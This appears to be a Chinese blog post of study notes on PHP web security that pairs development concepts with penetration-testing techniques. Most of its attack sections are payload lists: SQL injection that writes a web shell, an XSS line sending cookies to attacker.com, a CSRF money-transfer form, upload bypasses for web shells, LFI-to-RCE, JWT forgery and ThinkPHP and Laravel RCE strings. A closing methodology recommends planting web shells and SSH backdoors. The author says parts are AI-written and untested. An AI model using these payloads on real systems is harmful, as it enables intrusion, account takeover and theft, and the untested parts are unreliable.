本文就本周学习的PHP安全，整理了PHP安全开发的部分核心知识点和渗透测试方法。采用"开发实现→安全风险→渗透技术"的三段式学习路径，通过理解功能实现原理来构建有效的安全测试方案。所有内容均基于理论分析，实际测试未完全实现，部分方法借助ai撰写，博主会在后续实验测试。

结构

1. 表单提交安全
2. 文件上传安全
3. 文件管理安全
4. 身份验证安全
5. 模板与框架安全
6. 渗透测试方法论

一、表单提交安全与渗透测试

1.1 核心知识点

表单提交涉及用户输入处理、数据验证和数据库交互等关键环节，是Web应用最基础也最易受攻击的功能模块。主要风险包括SQL注入、XSS和CSRF等。

1.2 开发视角

• 表单数据处理流程：客户端输入 → 服务端接收 → 验证过滤 → 数据库操作
• 常见安全措施：参数化查询、输入过滤、输出编码、CSRF Token

1.3 渗透测试方案

SQL注入攻击

测试步骤：

1. 探测注入点

   ' OR 1=1--
   " AND SLEEP(5)#

2. 利用技术
   • 联合查询获取数据：' UNION SELECT username,password FROM users--
   • 盲注提取信息：' AND SUBSTRING(@@version,1,1)='8'--
   • 文件操作：' UNION SELECT "<?php system($_GET[cmd]); ?>",2 INTO OUTFILE "/var/www/shell.php"--

XSS攻击链

测试方法：

1. 存储型XSS测试

   <script>fetch('https://attacker.com/?cookie='+document.cookie)</script>

2. DOM型XSS测试

   eval(decodeURIComponent(location.hash.slice(1)))

3. 过滤绕过技术

   <img src=x onerror=alert(1)>
   \u003cscript\u003ealert(1)\u003c/script\u003e

CSRF漏洞利用

测试方案：

1. 基础CSRF测试

   <form action="https://target.com/transfer" method="POST">
   <input type="hidden" name="amount" value="10000">
   <input type="hidden" name="account" value="ATTACKER_IBAN">
   </form>
   <script>document.forms[0].submit()</script>

2. Token绕过技术
   • 通过XSS窃取Token
   • 滥用SameSite=None属性

二、文件上传安全与渗透测试

2.1 核心知识点

文件上传功能涉及类型检测、内容验证和存储管理等安全关键点，是获取系统权限的重要突破口。

2.2 开发视角

• 标准处理流程：文件接收 → 类型检查 → 内容验证 → 重命名存储 → 访问控制
• 常见防护措施：扩展名白名单、内容检测、随机命名、非Web目录存储

2.3 渗透测试方案

WebShell植入

测试步骤：

1. 扩展名绕过技术

   • 双扩展名：shell.php.jpg
   • 空字节截断：shell.php%00.jpg（PHP<5.3）
   • 大小写混淆：sHeLl.PhP

2. 内容检测绕过

   GIF89a; <?= system($_REQUEST['cmd']); ?>

   exiftool -Comment='<?php system($_GET["c"]); ?>' image.jpg

3. 解析漏洞利用

   • Apache：shell.php.xxx（错误配置时）
   • Nginx：/uploads/shell.jpg/.php（CVE-2013-4547）

目录遍历攻击

测试方法：

/../../etc/passwd
%2e%2e%2f%2e%2e%2fetc/passwd

三、文件管理安全与渗透测试

3.1 核心知识点

文件管理功能涉及路径解析、权限验证等安全问题，不当实现可能导致系统文件泄露或修改。

3.2 开发视角

• 功能实现：文件浏览、编辑、删除、压缩/解压
• 安全考虑：路径规范化、权限检查、操作日志

3.3 渗透测试方案

任意文件删除

测试案例：

POST /delete?file=../../application/config/database.php

文件包含漏洞

测试方法：

1. LFI转RCE

   ?page=php://filter/convert.base64-encode/resource=config
   ?page=data://text/plain,<?php system("id");?>

2. 日志注入

   ?page=/var/log/apache2/access.log
   User-Agent: <?php phpinfo();?>

四、身份验证安全与渗透测试

4.1 核心知识点

认证机制是系统安全的第一道防线，涉及凭证生成、传递和验证的全过程安全。

4.2 开发视角

• 认证方式比较：Cookie、Session、Token
• 安全措施：HttpOnly、Secure、SameSite、Token签名

4.3 渗透测试方案

Session劫持技术

测试方法：

1. 会话固定攻击

   Set-Cookie: PHPSESSID=ATTACKER_SESSION_ID

2. 跨子域劫持

   document.cookie = "PHPSESSID=ATTACKER_ID;domain=.example.com;path=/"

3. Session预测

   for i in range(1000,2000):
   requests.get(url, cookies={"PHPSESSID": md5(str(i))})

JWT攻击

测试步骤：

1. 算法混淆

   {"alg":"none"}

2. 密钥爆破

   hashcat -a 0 -m 16500 jwt.txt rockyou.txt

3. 过期时间伪造

   {"exp": 4102444800}  // 2100年过期

五、模板与框架安全渗透

5.1 核心知识点

现代PHP开发依赖模板引擎和框架，这些组件的安全性直接影响整个应用。

5.2 开发视角

• 模板引擎：Twig、Smarty等的工作原理
• 流行框架：Laravel、ThinkPHP的安全机制

5.3 渗透测试方案

框架漏洞利用

Laravel测试：

1. 信息泄露

   /.env
   /storage/logs/laravel.log

2. 反序列化RCE

   phpggc Laravel/RCE1 "system('id');" --phar

ThinkPHP测试：

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

WAF绕过技术

测试方法：

1. SQLi绕过

   /*!50000SELECT*/ 1,2,3 FROM users
   1' XOR(1=1)NOT'`

2. 文件上传绕过

   Content-Type: image/jpg
   Content-Disposition: form-data; name="file"; filename="shell.pHp"

六、渗透测试方法论

6.1 渗透原则

1. 侦察先行：扫描敏感文件（robots.txt, .git, .env）
2. 漏洞组合：如XSS + CSRF组合利用
3. 环境适配：根据服务组件选择利用链
4. 隐蔽渗透：使用DNS外带数据
5. 权限维持：植入WebShell后安装SSH后门

6.2 防御建议

1. 输入验证：严格过滤所有用户输入
2. 最小权限：限制各项操作权限
3. 安全配置：及时更新组件版本
4. 日志监控：记录并分析异常行为
5. 纵深防御：实施多层安全防护

重要声明：所有渗透测试必须获得合法授权，未经授权的测试属于违法行为。安全研究应遵循道德规范，共同维护网络空间安全。封面图片素材来源于：云视界素材库(https://public.ysjf.com)
素材标题：《自然风光_索松村_5_全景》
使用范围：仅限个人学习研究，不涉及任何商业用途